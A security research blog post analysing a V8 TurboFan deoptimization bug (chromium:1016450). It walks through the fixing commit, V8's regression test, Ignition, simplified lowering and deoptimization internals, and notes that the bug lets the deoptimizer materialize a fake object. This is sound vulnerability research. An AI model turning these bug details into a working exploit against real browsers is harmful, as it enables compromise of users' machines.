Introduction
Late 2019, I presented at an internal Azimuth Security conference some work on hacking Chrome through it's JavaScript engine.
One of the topics I've been playing with at that time was deoptimization and so I discussed, among others, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8. One of them was the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.
This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.
Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.
Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.
For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.
Motivation
The commit
To understand this security bug, it is necessary to delve into V8's internals.
Let's start with what the commit says:
Fixes word64-lowered BigInt in FrameState accumulator
Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1873692
Reviewed-by: Georg Neis <neis@chromium.org>
Commit-Queue: Nico Hartmann <nicohartmann@chromium.org>
Cr-Commit-Position: refs/heads/master@{#64469}
It fixes VisitFrameState
and VisitStateValues
in src/compiler/simplified-lowering.cc
.
diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
// TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
// truncated BigInts.
if (TypeOf(input).Is(Type::BigInt())) {
- ProcessInput(node, i, UseInfo::AnyTagged());
+ ConvertInput(node, i, UseInfo::AnyTagged());
}
(*types)[i] =
@@ -1220,11 +1220,22 @@
// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
+ Node* accumulator = node->InputAt(2);
if (propagate()) {
- EnqueueInput(node, 2, UseInfo::Any());
+ // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+ // truncated BigInts.
+ if (TypeOf(accumulator).Is(Type::BigInt())) {
+ EnqueueInput(node, 2, UseInfo::AnyTagged());
+ } else {
+ EnqueueInput(node, 2, UseInfo::Any());
+ }
} else if (lower()) {
+ // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+ // truncated BigInts.
+ if (TypeOf(accumulator).Is(Type::BigInt())) {
+ ConvertInput(node, 2, UseInfo::AnyTagged());
+ }
Zone* zone = jsgraph_->zone();
- Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
} else {
@@ -1237,7 +1248,7 @@
node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
types, SparseInputMask::Dense()),
- accumulator));
+ node->InputAt(2)));
}
}
This can be linked to a different commit that adds a related regression test:
Regression test for word64-lowered BigInt accumulator
This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692
Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1876057
Commit-Queue: Nico Hartmann <nicohartmann@chromium.org>
Auto-Submit: Nico Hartmann <nicohartmann@chromium.org>
Reviewed-by: Jakob Gruber <jgruber@chromium.org>
Reviewed-by: Georg Neis <neis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#64738}
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Flags: --allow-natives-syntax --opt --no-always-opt
let g = 0;
function f(x) {
let y = BigInt.asUintN(64, 15n);
// Introduce a side effect to force the construction of a FrameState that
// captures the value of y.
g = 42;
try {
return x + y;
} catch(_) {
return y;
}
}
%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);
Long story short
This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState
and StateValues
nodes. Those nodes are related to deoptimization.
During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.
Because after a deoptimizaton execution goes from optimized native code back to interpreted bytecode, the deoptimizer needs to know where to deoptimize to (ex: which bytecode offset?) and how to build a correct frame (ex: what ignition registers?). To do that, the deoptimizer uses those deoptimization input data built during code generation.
Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.
Internals
To understand this bug, we want to know:
- what is ignition (because we deoptimize back to ignition)
- what is simplified lowering (because that's where the bug is)
- what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)
Ignition
Overview
V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.
Ignition is a register machine. That means opcode's inputs and output are using only registers. There is an accumulator used as an implicit operand for many opcodes.
For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.
Let's observe the bytecode for a simple JavaScript function.
let opt_me = (o, val) => {
let value = val + 42;
o.x = value;
}
opt_me({x:1.1});
Using the --print-bytecode
and --print-bytecode-filter=opt_me
flags we can dump the corresponding generated bytecode.
Parameter count 3
Register count 1
Frame size 8
13 E> 0000017DE515F366 @ 0 : a5 StackCheck
41 S> 0000017DE515F367 @ 1 : 25 02 Ldar a1
45 E> 0000017DE515F369 @ 3 : 40 2a 00 AddSmi [42], [0]
0000017DE515F36C @ 6 : 26 fb Star r0
53 S> 0000017DE515F36E @ 8 : 25 fb Ldar r0
57 E> 0000017DE515F370 @ 10 : 2d 03 00 01 StaNamedProperty a0, [0], [1]
0000017DE515F374 @ 14 : 0d LdaUndefined
67 S> 0000017DE515F375 @ 15 : a9 Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
- map: 0x00d580740789 <Map>
- length: 1
0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)
Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline
in src/builtins/x64/builtins-x64.cc
.
d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
- map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown
address = 0000004B05BFE830
Trampoline (size = 13)
0000008C6B504400 0 49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80 (InterpreterEntryTrampoline)
0000008C6B50440A a 41ffe2 jmp r10
This code simply fetches the instructions from the function's BytecodeArray
and executes the corresponding ignition handler from a dispatch table.
d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
- code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
- interpreted
- bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...
Below is the part of Builtins::Generate_InterpreterEntryTrampoline
that loads the address of the dispatch table into the kInterpreterDispatchTableRegister
. Then it selects the current opcode using the kInterpreterBytecodeOffsetRegister
and kInterpreterBytecodeArrayRegister
. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size]
and then calls the handler. Those registers are described in src\codegen\x64\register-x64.h
.
// Load the dispatch table into a register and dispatch to the bytecode
// handler at the current bytecode offset.
Label do_dispatch;
__ bind(&do_dispatch);
__ Move(
kInterpreterDispatchTableRegister,
ExternalReference::interpreter_dispatch_table_address(masm->isolate()));
__ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, times_1, 0));
__ movq(kJavaScriptCallCodeStartRegister,
Operand(kInterpreterDispatchTableRegister, r11,
times_system_pointer_size, 0));
__ call(kJavaScriptCallCodeStartRegister);
masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());
// Any returns to the entry trampoline are either due to the return bytecode
// or the interpreter tail calling a builtin and then a dispatch.
// Get bytecode array and bytecode offset from the stack frame.
__ movq(kInterpreterBytecodeArrayRegister,
Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
__ movq(kInterpreterBytecodeOffsetRegister,
Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
__ SmiUntag(kInterpreterBytecodeOffsetRegister,
kInterpreterBytecodeOffsetRegister);
// Either return, or advance to the next bytecode and dispatch.
Label do_return;
__ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, times_1, 0));
AdvanceBytecodeOffsetOrReturn(masm, kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, rbx, rcx,
&do_return);
__ jmp(&do_dispatch);
Ignition handlers
Ignitions handlers are implemented in src/interpreter/interpreter-generator.cc
. They are declared using the IGNITION_HANDLER
macro. Let's look at a few examples.
Below is the implementation of JumpIfTrue
. The careful reader will notice that it is actually similar to the Code Stub Assembler
code (used to implement some of the builtins).
// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
Node* accumulator = GetAccumulator();
Node* relative_jump = BytecodeOperandUImmWord(0);
CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
CSA_ASSERT(this, IsBoolean(accumulator));
JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}
Binary instructions making use of inline caching
actually execute code implemented in src/ic/binary-op-assembler.cc
.
// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}
void BinaryOpWithFeedback(BinaryOpGenerator generator) {
Node* lhs = LoadRegisterAtOperandIndex(0);
Node* rhs = GetAccumulator();
Node* context = GetContext();
Node* slot_index = BytecodeOperandIdx(1);
Node* maybe_feedback_vector = LoadFeedbackVector();
BinaryOpAssembler binop_asm(state());
Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
maybe_feedback_vector, false);
SetAccumulator(result);
Dispatch();
}
From this code, we understand that when executing AddSmi [42], [0]
, V8 ends-up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback
.
The left hand side of the addition is the operand 0 ([42]
in this case), the right hand side is loaded from the accumulator register. It also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.
It is interesting to point out to observe the call to
Dispatch
. We may expect that every handler is called from within thedo_dispatch
label ofInterpreterEntryTrampoline
whereas actually the current ignition handler may do the dispatch itself (and thus does not directly go back to the do_dispatch)
Debugging
There is a built-in feature for debugging ignition bytecode that you can enable by switching v8_enable_trace_ignition
to true and recompile the engine. You may also want to change v8_enable_trace_feedbacks
.
This unlocks some interesting flags in the d8 shell such as:
- --trace-ignition
- --trace_feedback_updates
There are also a few interesting runtime functions:
- Runtime_InterpreterTraceBytecodeEntry
- prints ignition registers before executing an opcode
- Runtime_InterpreterTraceBytecodeExit
- prints ignition registers after executing an opcode
- Runtime_InterpreterTraceUpdateFeedback
- displays updates to the feedback vector slots
Let's try debugging a simple add
function.
function add(a,b) {
return a + b;
}
We can now see a dump of ignition registers at every step of the execution using --trace-ignition
.
[ r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
[ r2 -> 0x3ede813004a9 <undefined> ]
[ r3 -> 42 ]
[ r4 -> 1 ]
-> 0x193680a1fa56 @ 0 : a5 StackCheck
-> 0x193680a1fa57 @ 1 : 25 02 Ldar a1
[ a1 -> 1 ]
[ accumulator <- 1 ]
-> 0x193680a1fa59 @ 3 : 34 03 00 Add a0, [0]
[ accumulator -> 1 ]
[ a0 -> 42 ]
[ accumulator <- 43 ]
-> 0x193680a1fa5c @ 6 : a9 Return
[ accumulator -> 43 ]
-> 0x193680a1f83a @ 36 : 26 fb Star r0
[ accumulator -> 43 ]
[ r0 <- 43 ]
-> 0x193680a1f83c @ 38 : a9 Return
[ accumulator -> 43 ]
Simplified lowering
Simplified lowering is actually divided into three main phases :
- The truncation propagation phase (
RunTruncationPropagationPhase
)- backward propagation of truncations
- The type propagation phase (
RunTypePropagationPhase
)- forward propagation of types from type feedback
- The lowering phase (
Run
, after calling the previous phases)- may lower nodes
- may insert conversion nodes
To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below :
function f(a) {
if (a) {
var x = 2;
}
else {
var x = 5;
}
return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);
Propagating truncations
To understand how truncations get propagated, we want to trace the simplified lowering using --trace-representation
and look at the sea of nodes in Turbolizer right before the simplified lowering phase, which is by selecting the escape analysis phase in the menu.
The first phase starts from the End
node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged
.
visit #31: End (trunc: no-value-use)
initial #30: no-value-use
void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
case IrOpcode::kEnd:
// ...
case IrOpcode::kJSParseInt:
VisitInputs(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);
Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return
node is in the queue.
The visitor indicates use informations. The first input is truncated to a word32. The other inputs are not truncated.
The output is tagged
.
void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
switch (node->opcode()) {
// ...
case IrOpcode::kReturn:
VisitReturn(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);
// ...
}
}
void VisitReturn(Node* node) {
int tagged_limit = node->op()->ValueInputCount() +
OperatorProperties::GetContextInputCount(node->op()) +
OperatorProperties::GetFrameStateInputCount(node->op());
// Visit integer slot count to pop
ProcessInput(node, 0, UseInfo::TruncatingWord32());
// Visit value, context and frame state inputs as tagged.
for (int i = 1; i < tagged_limit; i++) {
ProcessInput(node, i, UseInfo::AnyTagged());
}
// Only enqueue other inputs (effects, control).
for (int i = tagged_limit; i < node->InputCount(); i++) {
EnqueueInput(node, i);
}
}
In the trace, we indeed observe that the End
node didn't propagate any truncation to the Return
node. However, the Return
node does truncate its first input.
visit #30: Return (trunc: no-value-use)
initial #29: truncate-to-word32
initial #28: no-truncation (but distinguish zeros)
queue #28?: no-truncation (but distinguish zeros)
initial #21: no-value-use
All the inputs (29, 28 21) are set in the queue and now have to be visited.
We can see that the truncation to word32 has been propagated to the node 29.
visit #29: NumberConstant (trunc: truncate-to-word32)
When visiting the node 28, the visitor for SpeculativeNumberModulus
, in that case, decides that the first two inputs should get truncated to word32.
visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
initial #24: truncate-to-word32
initial #23: truncate-to-word32
initial #13: no-value-use
queue #21?: no-value-use
Indeed, if we look at the code of the visitor, if both inputs are typed as Type::Unsigned32OrMinusZeroOrNaN()
, which is the case since they are typed as Range(66,66)
and Range(2,5)
, and the node truncation is a word32 truncation (not the case here since there is no truncation) or the node is typed as Type::Unsigned32()
(true because the node is typed as Range(0,4)
) then, a call to VisitWord32TruncatingBinop
is made.
This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to Any
. It also add all the inputs to the queue.
void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
(truncation.IsUsedAsWord32() ||
NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
// => unsigned Uint32Mod
VisitWord32TruncatingBinop(node);
if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
return;
}
// ...
}
void VisitWord32TruncatingBinop(Node* node) {
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
}
// Helper for binops of the I x I -> O variety.
void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
Type restriction_type = Type::Any()) {
VisitBinop(node, input_use, input_use, output, restriction_type);
}
// Helper for binops of the R x L -> O variety.
void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
MachineRepresentation output,
Type restriction_type = Type::Any()) {
DCHECK_EQ(2, node->op()->ValueInputCount());
ProcessInput(node, 0, left_use);
ProcessInput(node, 1, right_use);
for (int i = 2; i < node->InputCount(); i++) {
EnqueueInput(node, i);
}
SetOutput(node, output, restriction_type);
}
For the next node in the queue (#21), the visitor doesn't indicate any truncation.
visit #21: Merge (trunc: no-value-use)
initial #19: no-value-use
initial #17: no-value-use
It simply adds its own inputs to the queue and indicates that this Merge
node has a kTagged
output representation.
void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
case IrOpcode::kMerge:
// ...
case IrOpcode::kJSParseInt:
VisitInputs(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);
The SpeculativeNumberModulus
node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).
visit #24: NumberConstant (trunc: truncate-to-word32)
visit #23: Phi (trunc: truncate-to-word32)
initial #20: truncate-to-word32
initial #22: truncate-to-word32
queue #21?: no-value-use
visit #13: JSStackCheck (trunc: no-value-use)
initial #12: no-truncation (but distinguish zeros)
initial #14: no-truncation (but distinguish zeros)
initial #6: no-value-use
initial #0: no-value-use
Now let's have a look at the phi visitor. It simply forwards the propagations to its inputs and adds them to the queue. The output representation is inferred from the phi node's type.
// Helper for handling phis.
void VisitPhi(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
MachineRepresentation output =
GetOutputInfoForPhi(node, TypeOf(node), truncation);
// Only set the output representation if not running with type
// feedback. (Feedback typing will set the representation.)
SetOutput(node, output);
int values = node->op()->ValueInputCount();
if (lower()) {
// Update the phi operator.
if (output != PhiRepresentationOf(node->op())) {
NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
}
}
// Convert inputs to the output representation of this phi, pass the
// truncation along.
UseInfo input_use(output, truncation);
for (int i = 0; i < node->InputCount(); i++) {
ProcessInput(node, i, i < values ? input_use : UseInfo::None());
}
}
Finally, the phi node's inputs get visited.
visit #20: NumberConstant (trunc: truncate-to-word32)
visit #22: NumberConstant (trunc: truncate-to-word32)
They don't have any inputs to enqueue. Output representation is set to tagged signed
.
case IrOpcode::kNumberConstant: {
double const value = OpParameter<double>(node->op());
int value_as_int;
if (DoubleToSmiInteger(value, &value_as_int)) {
VisitLeaf(node, MachineRepresentation::kTaggedSigned);
if (lower()) {
intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
}
return;
}
VisitLeaf(node, MachineRepresentation::kTagged);
return;
}
We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.
Please note that a visitor may behave differently according to the phase that is currently being executing.
bool lower() const { return phase_ == LOWER; }
bool retype() const { return phase_ == RETYPE; }
bool propagate() const { return phase_ == PROPAGATE; }
That's why the NumberConstant visitor does not trigger a DeferReplacement
during the truncation propagation phase.
Retyping
There isn't so much to say about the retyping phase. Starting from the End node, every node of the graph is put in a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType
and revisited. This allows to forward propagate updated type information (starting from the Start, not the End).
As we can observe by tracing the phase, that's when final output representations are computed and displayed :
visit #29: NumberConstant
==> output kRepTaggedSigned
For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.
#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge) [Static type: Range(2, 5)]
visit #23: Phi
==> output kRepWord32
#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge) [Static type: Range(0, 4)]
visit #28: SpeculativeNumberModulus
==> output kRepWord32
Lowering and inserting conversions
Now that every node has been associated with use informations for every input as well as an output representation, the last phase consists in :
- lowering the node itself to a more specific one (via a
DeferReplacement
for instance) - converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with
ConvertInput
)
Note that a node won't necessarily change. There may not be any lowering and/or any conversion.
Let's get through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of the NumberConstant @29 has a kRepTaggedSigned representation. However, because it is used as its first input, the Return node wants it to be truncated to word32. Therefore, the node will get converted. This is done by the ConvertInput
function. It will itself call the representation changer via the function GetRepresentationFor
. Because the truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor
which then calls MakeTruncatedInt32Constant
.
Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
return jsgraph()->Int32Constant(DoubleToInt32(value));
}
visit #30: Return
change: #30:Return(@0 #29:NumberConstant) from kRepTaggedSigned to kRepWord32:truncate-to-word32
For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, it doesn't match and when calling ConvertInput
the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor
. If the type of the input (node #28) is a Signed31
, then TurboFan knows it can use a ChangeInt31ToTaggedSigned
operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4)
.
// ...
else if (IsWord(output_rep)) {
if (output_type.Is(Type::Signed31())) {
op = simplified()->ChangeInt31ToTaggedSigned();
}
visit #30: Return
change: #30:Return(@1 #28:SpeculativeNumberModulus) from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)
The last example we'll go through is the case of the SpeculativeNumberModulus node itself.
visit #28: SpeculativeNumberModulus
change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant) from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi
If we compare the graph (well, a subset), we can observe :
- the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
- the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
- node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the orange rectangle
This is before simplified lowering :
This is after :
The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod
which is called by the SpeculativeNumberModulus visitor.
void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
(truncation.IsUsedAsWord32() ||
NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
// => unsigned Uint32Mod
VisitWord32TruncatingBinop(node);
if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
return;
}
Node* SimplifiedLowering::Uint32Mod(Node* const node) {
Uint32BinopMatcher m(node);
Node* const minus_one = jsgraph()->Int32Constant(-1);
Node* const zero = jsgraph()->Uint32Constant(0);
Node* const lhs = m.left().node();
Node* const rhs = m.right().node();
if (m.right().Is(0)) {
return zero;
} else if (m.right().HasValue()) {
return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
}
// General case for unsigned integer modulus, with optimization for (unknown)
// power of 2 right hand side.
//
// if rhs == 0 then
// zero
// else
// msk = rhs - 1
// if rhs & msk != 0 then
// lhs % rhs
// else
// lhs & msk
//
// Note: We do not use the Diamond helper class here, because it really hurts
// readability with nested diamonds.
const Operator* const merge_op = common()->Merge(2);
const Operator* const phi_op =
common()->Phi(MachineRepresentation::kWord32, 2);
Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
graph()->start());
Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
Node* true0 = zero;
Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
Node* false0;
{
Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);
Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);
Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);
Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);
if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
}
Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
return graph()->NewNode(phi_op, true0, false0, merge0);
}
A high level overview of deoptimization
Understanding deoptimization requires to study several components of V8 :
- instruction selection
- when descriptors for FrameState and StateValues nodes are built
- code generation
- when deoptimization input data are built (that includes a
Translation
)
- when deoptimization input data are built (that includes a
- the deoptimizer
- at runtime, this is where execution is redirected to when "bailing out to deoptimization"
- uses the
Translation
- translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)
When looking at the sea of nodes in Turbolizer, you may see different kind of nodes related to deoptimization such as :
- Checkpoint
- refers to a FrameState
- FrameState
- refers to a position and a state, takes StateValues as inputs
- StateValues
- state of parameters, local variables, accumulator
- Deoptimize / DeoptimizeIf / DeoptimizeUnless etc
There are several types of deoptimization :
- eager, when you deoptimize the current function on the spot
- you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
- lazy, you deoptimize later
- another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
- soft
- a function got optimized too early, more feedback is needed
We are only discussing the case where optimized assembly code deoptimizes to ignition interpreted bytecode, that is the constructed output frame is called an interpreted frame
. However, there are other kinds of frames we are not going to discuss in this article (ex: adaptor frames, builtin continuation frames, etc). Michael Stanton, a V8 dev, wrote a few interesting blog posts you may want to check.
We know that javascript first gets translated to ignition bytecode (and a feedback vector is associated to that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data
to this optimized code.
When executing optimized code, if an assumption is violated (let's say, a type guard for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer
takes those deoptimization input data
to translate the current input frame
and compute an output frame
. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame
as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate
them. Finally, once everything is ready, it returns to the ignition interpreter.
During code generation
, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit
to which is attached a Translation
.
To build the translation, code generation uses information from structures such as a FrameStateDescriptor
and a list of StateValueDescriptor
. They obviously correspond to FrameState
and StateValues
nodes. Those structures are built during instruction selection
, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).
Tracing a deoptimization
Let's get through a quick experiment using the following script.
function add_prop(x) {
let obj = {};
obj[x] = 42;
}
add_prop("x");
%PrepareFunctionForOptimization(add_prop);
add_prop("x");
add_prop("x");
add_prop("x");
%OptimizeFunctionOnNextCall(add_prop);
add_prop("x");
add_prop("different");
Now run it using --turbo-profiling
and --print-code-verbose
.
This allows to dump the deoptimization input data :
Deoptimization Input Data (deopt points = 5)
index bytecode-offset pc commands
0 0 269 BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
STACK_SLOT {input=-1}
STACK_SLOT {input=4}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
// ...
4 6 NA BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rcx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}
And we also see the code used to bail out to deoptimization (notice that the deopt index matches with the index of a translation in the deoptimization input data).
// trimmed / simplified output
nop
REX.W movq r13,0x0 ;; debug: deopt position, script offset '17'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason '(unknown)'
;; debug: deopt index 0
call 0x55807c02040 ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4 ;; debug: deopt position, script offset '44'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason 'wrong name'
;; debug: deopt index 4
call 0x55807bc2040 ;; eager deoptimization bailout
nop
Interestingly (you'll need to also add the
--code-comments
flag), we can notice that the beginning of an native turbofan compiled function starts with a check for any required lazy deoptimization!
-- Prologue: check for deoptimization --
0x1332e5442b44 24 488b59e0 REX.W movq rbx,[rcx-0x20]
0x1332e5442b48 28 f6430f01 testb [rbx+0xf],0x1
